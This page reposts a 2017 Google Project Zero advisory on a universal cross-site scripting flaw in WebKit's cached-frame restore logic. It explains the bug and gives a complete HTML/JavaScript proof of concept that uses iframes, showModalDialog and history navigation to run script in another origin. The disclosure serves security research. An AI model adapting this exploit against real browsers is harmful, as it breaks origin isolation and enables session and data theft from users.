首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WebKit - enqueuePageshowEvent and enqueuePopstateEvent Universal Cross-Site Scri
来源:Google Security Research 作者:Google 发布时间:2017-05-31  
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1151
 
Here is a snippet of CachedFrameBase::restore which is invoked when cached frames are restored.
 
void CachedFrameBase::restore()
{
    ...
    for (auto& childFrame : m_childFrames) {
        ASSERT(childFrame->view()->frame().page());
        frame.tree().appendChild(childFrame->view()->frame());
        childFrame->open(); <----- (a)
    }
    ...
    // FIXME: update Page Visibility state here.
    // https://bugs.webkit.org/show_bug.cgi?id=116770
    m_document->enqueuePageshowEvent(PageshowEventPersisted);
 
    HistoryItem* historyItem = frame.loader().history().currentItem();
    if (historyItem && historyItem->stateObject())
        m_document->enqueuePopstateEvent(historyItem->stateObject());
 
    frame.view()->didRestoreFromPageCache();
}
 
enqueuePageshowEvent and enqueuePopstateEvent are named "enqueue*", but actually those *dispatch* window events that may fire JavaScript handlers synchronously.
 
At (a), |open| method may invoke |CachedFrameBase::restore| method again. Thus, the parent frame's document may be replaced while |open| is called in the iteration, the next child frame is attached to the parent frame holding the replaced document.
 
PoC:
-->
 
<html>
<body>
<script>
 
function createURL(data, type = 'text/html') {
    return URL.createObjectURL(new Blob([data], {type: type}));
}
 
function navigate(w, url) {
    let a = w.document.createElement('a');
    a.href = url;
    a.click();
}
 
function main() {
    let i0 = document.body.appendChild(document.createElement('iframe'));
    let i1 = document.body.appendChild(document.createElement('iframe'));
 
    i0.contentWindow.onpageshow = () => {
        navigate(window, 'https://abc.xyz/');
 
        showModalDialog(createURL(`
<script>
let it = setInterval(() => {
    try {
        opener.document.x;
    } catch (e) {
        clearInterval(it);
        window.close();
    }
}, 10);
</scrip` + 't>'));
 
    };
 
    i1.contentWindow.onpageshow = () => {
        i1.srcdoc = '<script>alert(parent.location);</scrip' + 't>';
        navigate(i1.contentWindow, 'about:srcdoc');
    };
 
    navigate(window, createURL(`<html><head></head><body>Click anywhere<script>
window.onclick = () => {
    window.onclick = null;
 
    history.back();
};
 
</scrip` + `t></body></html>`));
}
 
window.onload = () => {
    setTimeout(main, 0);
};
 
</script>
</body>
</html>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·WebKit - 'ContainerNode::parse
·WebKit - Stealing Variables vi
·Apple WebKit / Safari 10.0.3(1
·Apple Safari 10.0.3(12602.4.8)
·Apple WebKit / Safari 10.0.3(1
·Skia Graphics Library - Heap O
·Samba 3.5.0 - Remote Code Exec
·Mozilla Firefox < 53 - 'gfxTex
·Samba is_known_pipename() Arbi
·Mozilla Firefox < 53 - 'Convol
·Dup Scout Enterprise 9.7.18 -
·Sandboxie 5.18 - Local Denial
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved